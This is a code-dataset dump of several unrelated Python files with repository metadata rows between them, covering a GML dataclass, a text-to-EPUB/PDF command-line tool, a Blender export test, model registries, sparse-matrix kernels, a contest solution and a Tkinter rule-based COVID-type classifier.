@dataclass
class DictionaryType(DefinitionType):
"""A non-abstract bag that is specialized for use as a dictionary which
contains a set of definitions.
These definitions are referenced from other places, in the same and
different XML documents. In this restricted type, the inherited
optional "description" element can be used for a description of this
dictionary. The inherited optional "name" element can be used for
the name(s) of this dictionary. The inherited "metaDataProperty"
elements can be used to reference or contain more information about
this dictionary. The inherited required gml:id attribute allows the
dictionary to be referenced using this handle.
:ivar definition_member:
:ivar dictionary_entry: An entry in this dictionary. The content of
an entry can itself be a lower level dictionary or definition
collection. This element follows the standard GML property
model, so the value may be provided directly or by reference.
Note that if the value is provided by reference, this definition
does not carry a handle (gml:id) in this context, so does not
allow external references to this specific entry in this
context. When used in this way the referenced definition will
usually be in a dictionary in the same XML document.
:ivar indirect_entry: An identified reference to a remote entry in
this dictionary, to be used when this entry should be identified
to allow external references to this specific entry.
"""
definition_member: List[DefinitionMember] = field(
default_factory=list,
metadata={
"name": "definitionMember",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
dictionary_entry: List[DictionaryEntry] = field(
default_factory=list,
metadata={
"name": "dictionaryEntry",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
indirect_entry: List[IndirectEntry] = field(
default_factory=list,
metadata={
"name": "indirectEntry",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
"sequential": True,
},
)
@dataclass
class DefinitionCollection(DictionaryType):
class Meta:
namespace = "http://www.opengis.net/gml"
@dataclass
class Dictionary(DictionaryType):
class Meta:
namespace = "http://www.opengis.net/gml"
| 31.588988
| 81
| 0.592963
| 2,290
| 24,671
| 6.287773
| 0.117031
| 0.068616
| 0.08445
| 0.110216
| 0.401278
| 0.268838
| 0.259115
| 0.253281
| 0.162581
| 0.06299
| 0
| 0.002276
| 0.287747
| 24,671
| 780
| 82
| 31.629487
| 0.817152
| 0.140327
| 0
| 0.45827
| 0
| 0
| 0.225957
| 0.006924
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004552
| 0.091047
| 0
| 0.213961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00686acf3a82fe67d9e295e22aaec66f4b36661
| 2,468
|
py
|
Python
|
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
txt2epub_pdf/console.py
|
drthomas246/txt2epub-pdf
|
09d12a61e0d6f66512af7fdf9abfd4b384a5c648
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .package import txt2epub as txt2epub
from .package import txt2pdf as txt2pdf
import argparse
__version__ = "0.1.0"
def epub():
parser = argparse.ArgumentParser(
prog='txt2epub.exe',
description='テキストを電子書籍(epub)化する'
)
metadata = parser2metadata(parser)
epub_init = txt2epub(metadata)
print(epub_init.make())
def pdf():
parser = argparse.ArgumentParser(
prog='txt2pdf.exe',
description='テキストをPDF化する'
)
metadata = parser2metadata(parser)
pdf_init = txt2pdf(metadata)
print(pdf_init.make())
def parser2metadata(parser):
parser._actions[0].help = 'ヘルプの表示'
parser.add_argument('-v', '--version', action='version', version=('%(prog)s Ver.' + __version__), help='バージョン情報の表示')
parser.add_argument('PATH', help='フォルダのパス', metavar="PATH")
parser.add_argument('-t', '--title', help='タイトル', type=str, metavar='(STRINGS)')
parser.add_argument('-a', '--author', help='著者名', type=str, metavar='(STRINGS)')
parser.add_argument('-p', '--publisher', help='出版社名', type=str, metavar='(STRINGS)')
parser.add_argument('-tr', '--title_ruby', help='タイトルのルビ', type=str, metavar='(STRINGS)')
parser.add_argument('-s', '--sub_title', help='サブタイトル', type=str, metavar='(STRINGS)')
parser.add_argument('-ar', '--author_ruby', help='著者名のルビ', type=str, metavar='(STRINGS)')
parser.add_argument('-pr', '--publisher_ruby', help='出版社名のルビ', type=str, metavar='(STRINGS)')
parser.add_argument('-e', '--epub_version', help='電子書籍のバージョン', type=int, metavar='(INTEGER)', default=1)
parser.add_argument('-o', '--original_first_day', help='初版出版日', metavar='(YYYY-MM-DD)')
parser.add_argument('-u', '--original_url', help='著作物のURL', metavar='(URL)')
parser.add_argument('-i', '--illustrator', help='出版社名のルビ', type=str, metavar='(STRINGS)')
parser.add_argument('-f', '--fiction', help='フィクション表示', action='store_true')
args = parser.parse_args()
metadata = dict(
path=args.PATH,
title=args.title,
author=args.author,
publisher=args.publisher,
fiction=args.fiction,
sub_title=args.sub_title,
author_ruby=args.author_ruby,
publisher_ruby=args.publisher_ruby,
illustrator=args.illustrator,
version=args.epub_version,
original_first_day=args.original_first_day,
original_url=args.original_url
)
return metadata
| 37.393939
| 120
| 0.657212
| 295
| 2,468
| 5.328814
| 0.318644
| 0.080153
| 0.151399
| 0.10687
| 0.207379
| 0.207379
| 0.207379
| 0.062341
| 0.062341
| 0
| 0
| 0.008721
| 0.163695
| 2,468
| 65
| 121
| 37.969231
| 0.752907
| 0.017423
| 0
| 0.076923
| 0
| 0
| 0.196451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.057692
| 0
| 0.134615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00725d52685ae75cf07ae5d77c3ada997c869be
| 3,150
|
py
|
Python
|
tests/test_fileio_operators.py
|
ptrthomas/blender_mmd_tools
|
8b5053b9f2e7391cb9ac1e5114824cbbfd9d80cc
|
[
"MIT"
] | 2
|
2021-01-22T05:11:50.000Z
|
2021-02-19T11:58:00.000Z
|
tests/test_fileio_operators.py
|
jiastku98/blender_mmd_tools
|
ac26c55a985d62ae9439a961d27e796444d09069
|
[
"MIT"
] | 1
|
2022-01-29T05:46:50.000Z
|
2022-01-29T05:46:50.000Z
|
tests/test_fileio_operators.py
|
yhong3/blender_mmd_tools
|
53e16a46459328bccc444c84e50f22436e9cbc11
|
[
"MIT"
] | 1
|
2021-11-07T19:41:34.000Z
|
2021-11-07T19:41:34.000Z
|
import os
import shutil
import unittest
import bpy
from mmd_tools.core import pmx
from mmd_tools.core.model import Model
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
SAMPLES_DIR = os.path.join(os.path.dirname(TESTS_DIR), 'samples')
class TestFileIoOperators(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
Clean up output from previous tests
"""
output_dir = os.path.join(TESTS_DIR, 'output')
for item in os.listdir(output_dir):
if item.endswith('.OUTPUT'):
continue # Skip the placeholder
item_fp = os.path.join(output_dir, item)
if os.path.isfile(item_fp):
os.remove(item_fp)
elif os.path.isdir(item_fp):
shutil.rmtree(item_fp)
def setUp(self):
"""
We should start each test with a clean state
"""
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='SELECT')
bpy.ops.object.delete(use_global=True)
# Add some useful shortcuts
self.context = bpy.context
self.scene = bpy.context.scene
def test_export_shy_cube(self):
"""
This test will load the shy_cube.blend sample and check if it exports correctly.
The following checks will be made:
- The texture is properly copied to the target directory
- The material order is kept
"""
input_blend = os.path.join(SAMPLES_DIR, 'blends', 'shy_cube', 'shy_cube.blend')
if not os.path.isfile(input_blend):
self.fail('required sample file %s not found. Please download it' % input_blend)
output_pmx = os.path.join(TESTS_DIR, 'output', 'shy_cube.pmx')
bpy.ops.wm.open_mainfile(filepath=input_blend)
root = Model.findRoot(self.context.active_object)
rig = Model(root)
orig_material_names = [mat.mmd_material.name_j or mat.name for mat in rig.materials()]
try:
bpy.ops.mmd_tools.export_pmx(filepath=output_pmx)
except Exception:
self.fail("Exception happened during export")
else:
self.assertTrue(os.path.isfile(output_pmx), "File was not created") # Is this a race condition?
# Check if the texture was properly copied
tex_path = os.path.join(os.path.dirname(output_pmx), 'textures', 'blush.png')
self.assertTrue(os.path.isfile(tex_path), "Texture not copied properly")
# Load the resultant pmx file and check the material order is the expected
result_model = pmx.load(output_pmx)
result_material_names = [mat.name for mat in result_model.materials]
same_order = True
for orig, result in zip(orig_material_names, result_material_names):
if orig != result:
same_order = False
break
self.assertTrue(same_order, "Material order was lost")
if __name__ == '__main__':
import sys
sys.argv = [__file__] + (sys.argv[sys.argv.index("--") + 1:] if "--" in sys.argv else [])
unittest.main()
| 39.873418
| 108
| 0.626349
| 417
| 3,150
| 4.558753
| 0.364508
| 0.047344
| 0.031562
| 0.016833
| 0.092583
| 0.049448
| 0
| 0
| 0
| 0
| 0
| 0.000438
| 0.274921
| 3,150
| 78
| 109
| 40.384615
| 0.831874
| 0.149206
| 0
| 0
| 0
| 0
| 0.101472
| 0
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.054545
| false
| 0
| 0.127273
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a00cf121c8cf260456f4a0552e06a0dd6ae84b59
| 1,070
|
py
|
Python
|
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib-PyTorch
|
1a4e1c1939a42c30fe32dd8d6aff210e8604e77b
|
[
"MIT"
] | 4
|
2021-03-29T07:34:21.000Z
|
2021-04-25T08:25:30.000Z
|
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib
|
f96e3a71ae2dbeb44696725ec127ff8f37d4c6e9
|
[
"MIT"
] | null | null | null |
cv_lib/detection/models/__init__.py
|
zhfeing/deep-learning-lib
|
f96e3a71ae2dbeb44696725ec127ff8f37d4c6e9
|
[
"MIT"
] | 1
|
2021-03-30T07:13:31.000Z
|
2021-03-30T07:13:31.000Z
|
from functools import partial
from typing import Dict
import copy
from torch.nn import Module
from torchvision.models.resnet import *
from .ssd_resnet import SSD300_ResNet
from .ssd_vgg import SSD300_VGG16
from .backbones import *
__REGISTERED_MODELS__ = {
"SSD300_ResNet": SSD300_ResNet,
"SSD300_VGG16": SSD300_VGG16
}
__REGISTERED_BACKBONES__ = {
"ResNetBackbone": ResNetBackbone,
"VGGBackbone": VGGBackbone
}
def _get_model_instance(name):
try:
return __REGISTERED_MODELS__[name]
except:
raise Exception("Model {} not available".format(name))
def get_model_partial(model_cfg, n_classes: int) -> partial:
model_dict: Dict = copy.deepcopy(model_cfg)
name = model_dict.pop("arch")
model = _get_model_instance(name)
return partial(model, n_classes=n_classes, **model_dict)
def get_backbone(backbone_config) -> Backbone:
backbone_dict = copy.deepcopy(backbone_config)
t = backbone_dict.pop("type")
return __REGISTERED_BACKBONES__[t](**backbone_dict)
| 24.883721
| 63
| 0.715888
| 128
| 1,070
| 5.59375
| 0.351563
| 0.050279
| 0.050279
| 0.055866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027939
| 0.197196
| 1,070
| 42
| 64
| 25.47619
| 0.805588
| 0
| 0
| 0
| 0
| 0
| 0.077897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.266667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0100c7225ae95c3cbbf519ce214f82cef36e0ce
| 733
|
py
|
Python
|
csr/kernels/mkl/multiply.py
|
mdekstrand/csr
|
665ceefff882d7e42db41034246b6ddb1f93e372
|
[
"MIT"
] | 11
|
2021-02-07T16:37:31.000Z
|
2022-03-19T15:19:16.000Z
|
csr/kernels/mkl/multiply.py
|
mdekstrand/csr
|
665ceefff882d7e42db41034246b6ddb1f93e372
|
[
"MIT"
] | 25
|
2021-02-11T22:42:01.000Z
|
2022-01-27T21:04:31.000Z
|
csr/kernels/mkl/multiply.py
|
lenskit/csr
|
03fde2d8c3cb7eb330028f34765ff2a06f849631
|
[
"MIT"
] | 2
|
2021-02-07T02:05:04.000Z
|
2021-06-01T15:23:09.000Z
|
import numpy as np
from numba import njit
from ._api import * # noqa: F403
from .handle import mkl_h
__all__ = [
'mult_ab',
'mult_abt'
]
@njit(nogil=True)
def mult_ab(a_h, b_h):
if a_h.H and b_h.H:
h = lk_mkl_spmab(a_h.H, b_h.H)
else:
h = 0
return mkl_h(h, a_h.nrows, b_h.ncols, None)
@njit(nogil=True)
def mult_abt(a_h, b_h):
if a_h.H and b_h.H:
h = lk_mkl_spmabt(a_h.H, b_h.H)
else:
h = 0
return mkl_h(h, a_h.nrows, b_h.nrows, None)
@njit(nogil=True)
def mult_vec(a_h, x):
y = np.zeros(a_h.nrows, dtype=np.float64)
if a_h.H:
_x = ffi.from_buffer(x)
_y = ffi.from_buffer(y)
lk_mkl_spmv(1.0, a_h.H, _x, 0.0, _y)
return y
| 17.452381
| 47
| 0.587995
| 153
| 733
| 2.522876
| 0.281046
| 0.072539
| 0.046632
| 0.124352
| 0.450777
| 0.398964
| 0.274611
| 0.274611
| 0.274611
| 0.274611
| 0
| 0.020716
| 0.27558
| 733
| 41
| 48
| 17.878049
| 0.706215
| 0.013643
| 0
| 0.3
| 0
| 0
| 0.020804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.133333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a01762ca3e759a9a379ad71578ccb40a1edcad3d
| 738
|
py
|
Python
|
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | 1
|
2021-01-02T06:36:51.000Z
|
2021-01-02T06:36:51.000Z
|
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
from bisect import bisect_left, bisect_right
from collections import deque, Counter
from itertools import combinations, permutations
from math import gcd, sin, cos, tan, degrees, radians
import sys
input = lambda: sys.stdin.readline().rstrip()
MOD = 10 ** 9 + 7
INF = float("inf")
n, d, a = map(int, input().split())
monsters = [tuple(map(int, input().split())) for _ in range(n)]
monsters.sort()
now = 0
ans = 0
bomb = deque()
for m in monsters:
x = m[0]
attack_count = -(-m[1] // a)
while len(bomb) and bomb[0][0] < x:
b = bomb.popleft()
now -= b[1]
if attack_count > now:
ans += attack_count - now
bomb.append((x + 2 * d, attack_count - now))
now = attack_count
print(ans)
| 23.0625
| 63
| 0.624661
| 113
| 738
| 4.00885
| 0.530973
| 0.121413
| 0.092715
| 0.07064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021164
| 0.231707
| 738
| 32
| 64
| 23.0625
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.00406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a017a1ab05231fbc634e10328c46e53e752448d8
| 16,532
|
py
|
Python
|
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
from tkinter import*
from tkinter import font
from experta import *
raiz = Tk()
raiz.title("Sistema experto- Tipos de covid")
raiz.config(bg="#f4f7fa")
#raiz.resizable(0,0)
mi0Frame = Frame(raiz)#, width="1200", height="700")
mi0Frame.grid(row=1, column=0)
mi0Frame.config(bg="#f4f7fa")
mi3Frame = Frame(raiz)#, width="1200", height="700")
mi3Frame.grid(row=1, column=1)
mi3Frame.config(bg="#f4f7fa")
miFrame = Frame(raiz)#, width="1200", height="700")
miFrame.grid(row=2, column=0)
miFrame.config(bg="#f4f7fa")
mi2Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi2Frame.grid(row=2, column=1)
mi2Frame.config(bg="#f4f7fa")
mi4Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi4Frame.grid(row=0, column=0)
mi4Frame.config(bg="#f4f7fa")
reinicio = 0
#-----------------------------------------------INPUTS DE LOS SÍNTOMAS------------------------------------------------------------
sin0 = Label(miFrame, text="Dolor de cabeza:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin0.grid(row=0, column=0,padx=10, pady=10,sticky="e")
in_sin0 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin0.grid(row=0, column=1,padx=10, pady=10)
sin1 = Label(miFrame, text="Perdida del olfato:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin1.grid(row=1, column=0,padx=10, pady=10,sticky="e")
in_sin1 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin1.grid(row=1, column=1,padx=10, pady=10)
sin2 = Label(miFrame, text="Dolor muscular:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin2.grid(row=2, column=0,padx=10, pady=10,sticky="e")
in_sin2 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin2.grid(row=2, column=1,padx=10, pady=10)
sin3 = Label(miFrame, text="Tos:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin3.grid(row=3, column=0,padx=10, pady=10,sticky="e")
in_sin3 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin3.grid(row=3, column=1,padx=10, pady=10)
sin4 = Label(miFrame, text="Dolor de garganta:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin4.grid(row=4, column=0,padx=10, pady=10,sticky="e")
in_sin4 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin4.grid(row=4, column=1,padx=10, pady=10)
sin5 = Label(miFrame, text="Dolor en el pecho:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin5.grid(row=5, column=0,padx=10, pady=10,sticky="e")
in_sin5 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin5.grid(row=5, column=1,padx=10, pady=10)
sin6 = Label(miFrame, text="Fiebre:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin6.grid(row=6, column=0,padx=10, pady=10,sticky="e")
in_sin6 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin6.grid(row=6, column=1,padx=10, pady=10)
sin7 = Label(miFrame, text="Ronquera:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin7.grid(row=7, column=0,padx=10, pady=10,sticky="e")
in_sin7 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin7.grid(row=7, column=1,padx=10, pady=10)
sin8 = Label(miFrame, text="Pérdida del apetito:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin8.grid(row=8, column=0,padx=10, pady=10,sticky="e")
in_sin8 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin8.grid(row=8, column=1,padx=10, pady=10)
sin9 = Label(miFrame, text="Diarrea:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin9.grid(row=9, column=0,padx=10, pady=10,sticky="e")
in_sin9 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin9.grid(row=9, column=1,padx=10, pady=10)
sin10 = Label(miFrame, text="Fatiga:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin10.grid(row=10, column=0,padx=10, pady=10,sticky="e")
in_sin10 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin10.grid(row=10, column=1,padx=10, pady=10)
sin11 = Label(miFrame, text="Confusión:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin11.grid(row=11, column=0,padx=10, pady=10,sticky="e")
in_sin11 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin11.grid(row=11, column=1,padx=10, pady=10)
sin12 = Label(miFrame, text="Dificultad para respirar:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin12.grid(row=12, column=0,padx=10, pady=10,sticky="e")
in_sin12 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin12.grid(row=12, column=1,padx=10, pady=10)
#------Cuadros de los resultados--------
tipo_final_lbl = Label(mi2Frame, text="Tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
tipo_final_lbl.grid(row=2, column=0,padx=10, pady=10,sticky="n")
tipo_final = Entry(mi2Frame, width=35, justify='center', font=('FELIX TITLING', 10, font.BOLD))
tipo_final.grid(row=3, column=0, padx=1, pady=1)
blank = Label(mi2Frame, bg="#F0F8FF")
blank.grid(row=4, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo_lbl = Label(mi2Frame, text="Descripción del tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
descripcion_tipo_lbl.grid(row=5, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo = Text(mi2Frame, width=60, height=10)
descripcion_tipo.grid(row=6, column=0, padx=10, pady=10)
sugerencias_lbl = Label(mi2Frame, text="Sugerencias para tratar la enfermedad:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sugerencias_lbl.grid(row=7, column=0,padx=10, pady=10,sticky="n")
sugerencias = Text(mi2Frame, width=60, height=10)
sugerencias.grid(row=8, column=0, padx=10, pady=10)
#------HEADER--------
head1 = Label(mi0Frame, text="\nSÍNTOMAS", bg="#F0F8FF", font=('Elephant', 15))
head1.grid(row=0, column=0, sticky="n")
head1_0 = Label(mi3Frame, text="DIAGNÓSTICO", bg="#F0F8FF", font=('Elephant', 15))
head1_0.grid(row=0, column=0, sticky="n")
head1 = Label(mi0Frame, bg="#F0F8FF")
head1.grid(row=1, column=0, sticky="n")
head2 = Label(mi0Frame, text=" -Introduce un 'si' o un 'no' dependiendo de los síntomas que presentes",
bg="#F0F8FF", font=('Century Ghotic', 11))
head2.grid(row=2, column=0, sticky="n" )
head3 = Label(mi4Frame, text="Sistema experto - Tipos de COVID", bg="#F0F8FF", font=('Elephant', 15))
head3.grid(row=0)
#-----------------------------------------^^^^^^INPUTS DE LOS SÍNTOMAS^^^^^^------------------------------------------------------
lista_tipos = []
sintomas_tipo = []
map_sintomas = {}
d_desc_map = {}
d_tratamiento_map = {}
def preprocess():
global lista_tipos,sintomas_tipo,map_sintomas,d_desc_map,d_tratamiento_map
tipos = open("tipos.txt")
tipos_t = tipos.read()
lista_tipos = tipos_t.split("\n")
tipos.close()
for tipo in lista_tipos:
tipo_s_file = open("Sintomas tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
s_list = tipo_s_data.split("\n")
sintomas_tipo.append(s_list)
map_sintomas[str(s_list)] = tipo
tipo_s_file.close()
tipo_s_file = open("Descripcion tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_desc_map[tipo] = tipo_s_data
tipo_s_file.close()
tipo_s_file = open("Tratamientos tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_tratamiento_map[tipo] = tipo_s_data
tipo_s_file.close()
def identificar_tipo(*arguments):
lista_sintomas = []
for sintoma in arguments:
lista_sintomas.append(sintoma)
# Handle key error
return map_sintomas[str(lista_sintomas)]
def get_details(tipo):
return d_desc_map[tipo]
def get_tratamiento(tipo):
return d_tratamiento_map[tipo]
def no_coincide(tipo):
tipo_final.delete("1.0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("1.0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0", tratamientos)
#def identificar_tipo(dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera, perdida_apetito , diarrea, fatiga, confusión, dificultad_respiratoria):
class Covid(KnowledgeEngine):
@DefFacts()
def _initial_action(self):
yield Fact(action="encontrar_tipo")
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_cabeza=W())),salience = 1)
def sintoma_0(self):
self.declare(Fact(dolor_cabeza=in_sin0.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_olfato=W())),salience = 1)
def sintoma_1(self):
self.declare(Fact(perdida_olfato=in_sin1.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_muscular=W())),salience = 1)
def sintoma_2(self):
self.declare(Fact(dolor_muscular=in_sin2.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(tos=W())),salience = 1)
def sintoma_3(self):
self.declare(Fact(tos=in_sin3.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_garganta=W())),salience = 1)
def sintoma_4(self):
self.declare(Fact(dolor_garganta=in_sin4.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_pecho=W())),salience = 1)
def sintoma_5(self):
self.declare(Fact(dolor_pecho=in_sin5.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fiebre=W())),salience = 1)
def sintoma_6(self):
self.declare(Fact(fiebre=in_sin6.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(ronquera=W())),salience = 1)
def sintoma_7(self):
self.declare(Fact(ronquera=in_sin7.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_apetito=W())),salience = 1)
def sintoma_8(self):
self.declare(Fact(perdida_apetito=in_sin8.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(diarrea=W())),salience = 1)
def sintoma_9(self):
self.declare(Fact(diarrea=in_sin9.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fatiga=W())),salience = 1)
def sintoma_10(self):
self.declare(Fact(fatiga=in_sin10.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(confusion=W())),salience = 1)
def sintoma_11(self):
self.declare(Fact(confusion=in_sin11.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dificultad_respiratoria=W())),salience = 1)
def sintoma_12(self):
self.declare(Fact(dificultad_respiratoria=in_sin12.get()))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_0(self):
self.declare(Fact(tipo="Gripal sin fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="no"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_1(self):
self.declare(Fact(tipo="Gripal con fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="si"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_2(self):
self.declare(Fact(tipo="Gastro Intestinal"))
